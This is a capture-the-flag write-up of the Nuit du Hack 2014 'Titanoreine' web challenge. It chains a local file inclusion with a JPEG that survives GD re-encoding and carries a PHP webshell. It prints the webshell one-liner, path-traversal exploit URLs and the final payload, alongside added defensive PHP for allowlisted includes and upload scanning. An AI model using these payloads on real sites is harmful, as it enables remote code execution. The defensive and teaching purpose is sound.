Title: Nuit du Hack 2014 Quals - Titanoreine (web 300)
Date: 2014/04/06 16:30

Titanoreine was a funny challenge. We were provided a website where we could
upload some pictures. There was also an obvious [LFI](
https://en.wikipedia.org/wiki/Include_vulnerability#Local_File_Inclusion ). One
may think that you just have to put some php like `<?php system($_GET['c']);?>`
into the metadata field to get code execution. The twist here was that the
image was processed by [php-gd]( https://www.php.net/manual/en/book.image.php ),
trashing our precious metadata.
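The include that made this challenge solvable is the part a defender should look at. The following is an added example, not the challenge's source (which is not shown here): the vulnerable shape of a `?lang=` include next to an allowlist-based replacement. The `./lang/` directory and the `en`/`fr` file names are assumptions.

```php
<?php
// Added example, not the challenge code. Assumed layout: translation files live
// in ./lang/<code>.php and are chosen by the ?lang=<code> request parameter.

// Vulnerable pattern: the request parameter is used directly as the include
// path, so any readable file on the box (an uploaded picture included) is
// parsed as PHP, metadata and pixel data alike.
function load_language_vulnerable(string $lang): void
{
    include $lang;   // LFI: the caller controls the whole path
}

// Hardened pattern: the parameter is a key into a fixed table, never a path
// fragment. Unknown values fall back to a default instead of being concatenated.
const LANG_FILES = [
    'en' => __DIR__ . '/lang/en.php',   // assumed file
    'fr' => __DIR__ . '/lang/fr.php',   // assumed file
];

function resolve_language_file(?string $lang): string
{
    if ($lang !== null && array_key_exists($lang, LANG_FILES)) {
        return LANG_FILES[$lang];
    }
    return LANG_FILES['en'];
}

function load_language_hardened(?string $lang): void
{
    $file = resolve_language_file($lang);

    // Defence in depth: even an allowlisted path must resolve below ./lang,
    // which protects against a mistake in the table or a symlink in that dir.
    $real = realpath($file);
    $base = realpath(__DIR__ . '/lang');
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file outside the allowed directory');
    }
    include $real;
}

load_language_hardened($_GET['lang'] ?? null);
```

The allowlist is what removes the bug; the `realpath` check only guards against the table itself being wrong. Note that `open_basedir` or stripping `../` from the parameter would not have helped here, because the included file was a legitimately uploaded picture sitting inside the application's own directory tree.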

Notfound, from the [hexpresso]( http://hexpresso.wordpress.com/ ) team, reminded
me that one of the organizers was [virtualabs]( http://virtualabs.fr ). I
vaguely remembered that he wrote an article about transformation-resistant
pictures to get a php shell. He even provides a
[script]({static}/files/bulletjpg.py) to generate the images. What a
coincidence.

First we tried to use the [system](
https://www.php.net/manual/en/function.system.php) command in our payload, but
it seemed that it was not authorised. We switched to [eval](
https://www.php.net/manual/en/function.eval.php). By the way, thank you php for
providing so [many functions](
https://stackoverflow.com/questions/6470760/dangerous-php-functions ) to get
code execution.

Here is the image that we used, ![webshelljpg]({static}/images/webshelljpg.jpg) 

The payload is roughly equivalent to `<?php system($_GET['c']);?>`.

Feel free to transform it with php-gd at quality 98 (the one used by the challenge; by the way, thanks to the teams that used the `exploit-98.jpg` filename for the hint ;) ) and look at our payload with your [favorite]( http://rada.re ) hex editor.

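Since the payload survives the php-gd round trip, re-encoding an upload is not sanitisation. The following is an added example (not the challenge's code) of the check a defender would add on top of it: re-encode the upload with GD at the same quality, then inspect the bytes that are actually going to disk and refuse the file if a PHP open tag is still present. The upload directory, the field name `picture` and the file-naming scheme are assumptions.

```php
<?php
// Added example, not the challenge code. Re-encodes an uploaded JPEG with GD
// (quality 98, the value the page mentions) and rejects the result if it still
// carries a PHP open tag. UPLOAD_DIR and the form field name are assumptions.

const UPLOAD_DIR   = '/var/uploads';   // assumed: outside the web root, never included
const JPEG_QUALITY = 98;

// Decode and re-encode with GD. Metadata is dropped in the process, but bytes
// that live in the compressed image data can survive at the right quality.
function reencode_jpeg(string $src, string $dst, int $quality = JPEG_QUALITY): bool
{
    $im = @imagecreatefromjpeg($src);
    if ($im === false) {
        return false;   // not a decodable JPEG: reject outright
    }
    $ok = imagejpeg($im, $dst, $quality);
    imagedestroy($im);
    return $ok;
}

// Look for <?php, <?= or a bare <? in the stored bytes. XMP metadata (which
// also contains "<?xml") does not survive GD, so this is not a false positive
// source on re-encoded output.
function contains_php_open_tag(string $bytes): bool
{
    return preg_match('/<\?(php|=)?/i', $bytes) === 1;
}

function accept_upload(string $tmpPath, string $storedName): bool
{
    // The server picks the name and the extension; the client's name is ignored.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $storedName)) {
        return false;
    }
    $dst = UPLOAD_DIR . '/' . $storedName . '.jpg';

    if (!reencode_jpeg($tmpPath, $dst)) {
        return false;
    }

    $bytes = file_get_contents($dst);
    if ($bytes === false || contains_php_open_tag($bytes)) {
        @unlink($dst);   // quarantine or delete: the re-encoded file is still suspicious
        return false;
    }
    return true;
}

if (isset($_FILES['picture']) && $_FILES['picture']['error'] === UPLOAD_ERR_OK) {
    $ok = accept_upload($_FILES['picture']['tmp_name'], bin2hex(random_bytes(8)));
    echo $ok ? 'stored' : 'rejected';
}
```

The byte scan is a detection, not the fix: the fix is that nothing under `UPLOAD_DIR` is ever passed to `include`, and that the directory is served (if at all) as static content with PHP execution disabled. With both in place, a payload that survives GD is a curiosity in the logs rather than a shell.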
We lost quite some time trying to get this kind of URL working:

    http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;

Here is the correct form:

    http://gallery.nuitduhack.com/index.php?c=echo 1;lang=../../../includes/ble.jpg

or

    http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;

This was the "Omg plz kill me" moment of the ctf.

Anyway, we used [glob]( http://php.net/manual/en/function.glob.php ) and [file_get_contents]( http://php.net/manual/en/function.file-get-contents.php ) to get the flag.

![glob]({static}/images/ndh_titanoreine_blog.jpeg)

Here is our final payload: `http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg`

![flag]({static}/images/ndh_titanoreine_flag.jpeg)

flag: `WhyAreHemorrhoidsNotCalledAssteroids`
